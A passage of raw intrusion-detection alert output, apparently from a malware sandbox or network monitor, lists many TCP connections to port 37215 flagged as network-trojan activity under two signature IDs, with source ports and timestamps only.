                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.161125
                  SID:2829579
                  Source Port:38522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.006085
                  SID:2829579
                  Source Port:37746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.536379
                  SID:2829579
                  Source Port:50222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.410834
                  SID:2835222
                  Source Port:48876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.828457
                  SID:2829579
                  Source Port:58314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.008254
                  SID:2829579
                  Source Port:49002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.030544
                  SID:2835222
                  Source Port:50828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.197285
                  SID:2835222
                  Source Port:38624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.864338
                  SID:2829579
                  Source Port:57640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.326133
                  SID:2829579
                  Source Port:33822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.440353
                  SID:2835222
                  Source Port:51880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.527598
                  SID:2829579
                  Source Port:42182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.723729
                  SID:2835222
                  Source Port:34696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.623347
                  SID:2835222
                  Source Port:53166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.829275
                  SID:2829579
                  Source Port:55854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.533117
                  SID:2829579
                  Source Port:49782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.419623
                  SID:2835222
                  Source Port:37258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.744023
                  SID:2835222
                  Source Port:47388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.512534
                  SID:2829579
                  Source Port:35704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.957871
                  SID:2835222
                  Source Port:33490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.854499
                  SID:2829579
                  Source Port:59516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.401175
                  SID:2835222
                  Source Port:43864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.622177
                  SID:2829579
                  Source Port:58614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.236925
                  SID:2835222
                  Source Port:44704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.648107
                  SID:2829579
                  Source Port:36822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:36.290349
                  SID:2829579
                  Source Port:49682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.805263
                  SID:2829579
                  Source Port:39264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.106544
                  SID:2835222
                  Source Port:45748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.376738
                  SID:2835222
                  Source Port:46732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.446106
                  SID:2835222
                  Source Port:41256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.127756
                  SID:2829579
                  Source Port:37272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.204295
                  SID:2829579
                  Source Port:39670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.860758
                  SID:2829579
                  Source Port:44822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.936738
                  SID:2829579
                  Source Port:47726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.193272
                  SID:2835222
                  Source Port:49972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.487311
                  SID:2835222
                  Source Port:33052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.621060
                  SID:2835222
                  Source Port:40254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.169411
                  SID:2835222
                  Source Port:59604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.598606
                  SID:2829579
                  Source Port:51142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.177633
                  SID:2829579
                  Source Port:57522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.198368
                  SID:2835222
                  Source Port:52230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.878346
                  SID:2829579
                  Source Port:47812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.317114
                  SID:2835222
                  Source Port:58024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.861984
                  SID:2829579
                  Source Port:33096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.805818
                  SID:2829579
                  Source Port:48282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.558998
                  SID:2829579
                  Source Port:38264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.625884
                  SID:2835222
                  Source Port:34776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.499306
                  SID:2829579
                  Source Port:56350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.575059
                  SID:2829579
                  Source Port:51640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.093550
                  SID:2829579
                  Source Port:46080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.546157
                  SID:2835222
                  Source Port:43124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.758860
                  SID:2829579
                  Source Port:59730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.809030
                  SID:2829579
                  Source Port:35486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.855316
                  SID:2835222
                  Source Port:57986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.276755
                  SID:2829579
                  Source Port:38278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.070313
                  SID:2835222
                  Source Port:37406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.633686
                  SID:2835222
                  Source Port:55904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.823205
                  SID:2829579
                  Source Port:41420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.322147
                  SID:2829579
                  Source Port:54268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.313392
                  SID:2835222
                  Source Port:59262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.849427
                  SID:2829579
                  Source Port:51474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.368823
                  SID:2829579
                  Source Port:41310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.800332
                  SID:2829579
                  Source Port:56762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.339309
                  SID:2835222
                  Source Port:59624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.662129
                  SID:2829579
                  Source Port:51310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.250485
                  SID:2835222
                  Source Port:47104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.647269
                  SID:2829579
                  Source Port:38142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.586021
                  SID:2829579
                  Source Port:59272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.953506
                  SID:2829579
                  Source Port:47654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.202917
                  SID:2835222
                  Source Port:34788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.397688
                  SID:2835222
                  Source Port:55048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.758146
                  SID:2829579
                  Source Port:34668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.788071
                  SID:2835222
                  Source Port:52324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.363938
                  SID:2835222
                  Source Port:56536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.777925
                  SID:2835222
                  Source Port:60644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.901857
                  SID:2829579
                  Source Port:33966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.412388
                  SID:2829579
                  Source Port:44204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.334361
                  SID:2829579
                  Source Port:46410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.580617
                  SID:2829579
                  Source Port:53556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.840448
                  SID:2835222
                  Source Port:55102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.996521
                  SID:2829579
                  Source Port:58684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.642982
                  SID:2829579
                  Source Port:41818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.436856
                  SID:2829579
                  Source Port:47012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.366758
                  SID:2829579
                  Source Port:55120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.979594
                  SID:2829579
                  Source Port:50994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.654831
                  SID:2829579
                  Source Port:50068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.735455
                  SID:2835222
                  Source Port:48218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.989706
                  SID:2835222
                  Source Port:44074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.811760
                  SID:2829579
                  Source Port:49608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.817840
                  SID:2829579
                  Source Port:43740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.783603
                  SID:2835222
                  Source Port:41906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.788473
                  SID:2835222
                  Source Port:45968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.340130
                  SID:2829579
                  Source Port:50918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.778157
                  SID:2829579
                  Source Port:51620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.027342
                  SID:2829579
                  Source Port:37538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.784403
                  SID:2835222
                  Source Port:58630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.951496
                  SID:2835222
                  Source Port:45264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.440849
                  SID:2835222
                  Source Port:42266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.191289
                  SID:2829579
                  Source Port:39302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.945424
                  SID:2829579
                  Source Port:45122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.354295
                  SID:2829579
                  Source Port:50282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.569562
                  SID:2829579
                  Source Port:58878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.375701
                  SID:2835222
                  Source Port:34534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.131839
                  SID:2835222
                  Source Port:43596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.012219
                  SID:2835222
                  Source Port:37232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.546125
                  SID:2835222
                  Source Port:36666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.085617
                  SID:2829579
                  Source Port:58488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.182553
                  SID:2835222
                  Source Port:50766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.545606
                  SID:2835222
                  Source Port:35010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.748001
                  SID:2829579
                  Source Port:54942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.794117
                  SID:2835222
                  Source Port:40420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.084191
                  SID:2829579
                  Source Port:42588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.426350
                  SID:2835222
                  Source Port:57350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.559340
                  SID:2835222
                  Source Port:49004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.766220
                  SID:2835222
                  Source Port:53490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.069487
                  SID:2829579
                  Source Port:40390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.948537
                  SID:2829579
                  Source Port:55536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.802348
                  SID:2835222
                  Source Port:37710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.404259
                  SID:2829579
                  Source Port:54760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.409730
                  SID:2835222
                  Source Port:36198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.126538
                  SID:2835222
                  Source Port:56252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.296739
                  SID:2835222
                  Source Port:34592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.367702
                  SID:2835222
                  Source Port:56692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.993711
                  SID:2835222
                  Source Port:41330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.070020
                  SID:2835222
                  Source Port:35930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.808876
                  SID:2829579
                  Source Port:47754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.404911
                  SID:2835222
                  Source Port:36944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.617808
                  SID:2835222
                  Source Port:52612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.835787
                  SID:2835222
                  Source Port:43920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.657755
                  SID:2829579
                  Source Port:33608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.587332
                  SID:2835222
                  Source Port:46130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.511682
                  SID:2829579
                  Source Port:42872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.868955
                  SID:2829579
                  Source Port:46592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.361617
                  SID:2835222
                  Source Port:59846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.850247
                  SID:2829579
                  Source Port:59496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.518988
                  SID:2835222
                  Source Port:49140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.868909
                  SID:2829579
                  Source Port:51100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.784523
                  SID:2835222
                  Source Port:37142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.506153
                  SID:2835222
                  Source Port:46302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.866272
                  SID:2835222
                  Source Port:40212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.391296
                  SID:2835222
                  Source Port:52156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.773956
                  SID:2835222
                  Source Port:57462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.772266
                  SID:2829579
                  Source Port:57822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.733003
                  SID:2835222
                  Source Port:34866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.381146
                  SID:2835222
                  Source Port:47606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.542620
                  SID:2829579
                  Source Port:53594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.426882
                  SID:2829579
                  Source Port:35138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.112679
                  SID:2829579
                  Source Port:56734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.478672
                  SID:2835222
                  Source Port:50906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.127270
                  SID:2829579
                  Source Port:48698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.088792
                  SID:2835222
                  Source Port:34820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.857818
                  SID:2835222
                  Source Port:47736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.210385
                  SID:2829579
                  Source Port:46042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.230856
                  SID:2835222
                  Source Port:37504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.796387
                  SID:2829579
                  Source Port:46690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.862601
                  SID:2835222
                  Source Port:38680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.373908
                  SID:2835222
                  Source Port:35398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.297674
                  SID:2835222
                  Source Port:57202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.057809
                  SID:2835222
                  Source Port:53562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.172014
                  SID:2829579
                  Source Port:36324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.251063
                  SID:2835222
                  Source Port:39168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.666062
                  SID:2835222
                  Source Port:46630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.437789
                  SID:2835222
                  Source Port:50374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.650487
                  SID:2829579
                  Source Port:38966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.365673
                  SID:2835222
                  Source Port:40040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.944917
                  SID:2829579
                  Source Port:39158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.600556
                  SID:2829579
                  Source Port:58142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.523896
                  SID:2835222
                  Source Port:53152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.921893
                  SID:2829579
                  Source Port:46242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.448345
                  SID:2835222
                  Source Port:41418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.871323
                  SID:2835222
                  Source Port:40154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.601357
                  SID:2829579
                  Source Port:46942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.179823
                  SID:2829579
                  Source Port:49170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.853757
                  SID:2829579
                  Source Port:34704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.607360
                  SID:2835222
                  Source Port:58484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.176509
                  SID:2835222
                  Source Port:55890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.527827
                  SID:2835222
                  Source Port:47480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.733003
                  SID:2835222
                  Source Port:39372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.524985
                  SID:2835222
                  Source Port:39002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.443855
                  SID:2829579
                  Source Port:56874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.873682
                  SID:2835222
                  Source Port:52834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.819008
                  SID:2829579
                  Source Port:34352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.561854
                  SID:2835222
